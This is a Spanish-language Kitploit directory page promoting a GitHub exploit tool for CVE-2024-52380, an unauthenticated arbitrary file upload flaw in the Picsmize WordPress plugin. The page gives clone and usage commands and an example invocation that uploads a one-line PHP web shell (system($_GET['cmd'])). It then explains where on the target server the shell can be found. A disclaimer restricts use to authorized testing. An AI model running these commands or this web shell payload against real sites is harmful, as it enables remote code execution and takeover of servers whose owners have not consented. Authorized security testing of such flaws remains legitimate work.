Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-52380-Exploit — El plugin Picsmize para WordPress es vulnerable a subidas de archivos arbitrarias. | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2024-52380-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubnxploited/cve-2024-52380-exploit

CVE-2024-52380-Exploit

El plugin Picsmize para WordPress es vulnerable a subidas de archivos arbitrarias.

Ver Repositorio
31hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-52380-Exploit

El plugin Picsmize para WordPress es vulnerable a subidas de archivos arbitrarias.

Descripción

Este script explota una vulnerabilidad (CVE-2024-52380) en el plugin Picsmize para WordPress, permitiendo a atacantes no autenticados realizar subidas de archivos arbitrarias. Esta vulnerabilidad existe en todas las versiones de Picsmize hasta la 1.0.0 inclusive. La explotación de esta vulnerabilidad puede resultar en la ejecución remota de código en el servidor objetivo.

🌟 Características

  • Verificar Versión del Plugin: Verifica automáticamente si el sitio WordPress objetivo está utilizando una versión vulnerable del plugin Picsmize.
  • Explotación de Subida de Archivos: Sube cargas útiles PHP arbitrarias al servidor objetivo si el sitio es vulnerable.
  • Interfaz de Línea de Comandos: CLI fácil de usar para especificar URLs objetivo y cargas útiles.

📖 Detalles de la Vulnerabilidad

  • Nombre del Plugin: Picsmize
  • Versiones Afectadas: Todas las versiones ≤ 1.0.0
  • Tipo de Vulnerabilidad: Subida de Archivos Arbitraria No Autenticada
  • CVE ID: CVE-2024-52380

🚀 Instrucciones de Uso

Requisitos Previos

  • Python 3.7 o superior
  • Librería requests (pip install requests)

Ejecutar el Script

  1. Clona el repositorio:
    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
    cd CVE-2024-52380-Exploit
    

Uso -help:

root@kitploit:~
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]

Check plugin version and upload a PHP file to a WordPress site.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site (e.g., http://192.168.100.74:888).
  -c CONTENT, --content CONTENT
                        Content of the PHP file to be uploaded.

Ejemplo

root@kitploit:~
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"

Argumentos de Línea de Comandos

El script proporciona dos argumentos de línea de comandos para facilitar su uso:

  1. -u / --url (obligatorio):

    • Propósito: Especifica la URL base del sitio WordPress objetivo.
    • Ejemplo:
      root@kitploit:~
      -u http://example.com
      
  2. -c / --content (opcional):

    • Propósito: Establece el contenido de la carga útil PHP a subir.
    • Valor por Defecto:
      root@kitploit:~
      <?php phpinfo(); ?>
      
    • Ejemplo:
      root@kitploit:~
      -c "<?php system($_GET['cmd']); ?>"
      

📂 Ruta de Subida de Archivos

Explicación:

  • /wordpress: Directorio raíz del sitio WordPress.
  • wp-content/uploads: Directorio por defecto para subidas de medios en WordPress.
  • 2025/01: La estructura de directorios corresponde al año (2025) y mes (enero) según la configuración de fecha del servidor.

Cómo Acceder al Archivo Subido:

  1. Después de una subida exitosa, navega al archivo usando la URL completa. Ejemplo:

http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php

⚠️ Descargo de Responsabilidad

Este script está destinado únicamente a fines educativos y pruebas de seguridad autorizadas. El uso no autorizado de esta herramienta contra sistemas que no poseas o para los que no tengas permiso explícito para probar es ilegal y poco ético.

Descargar herramienta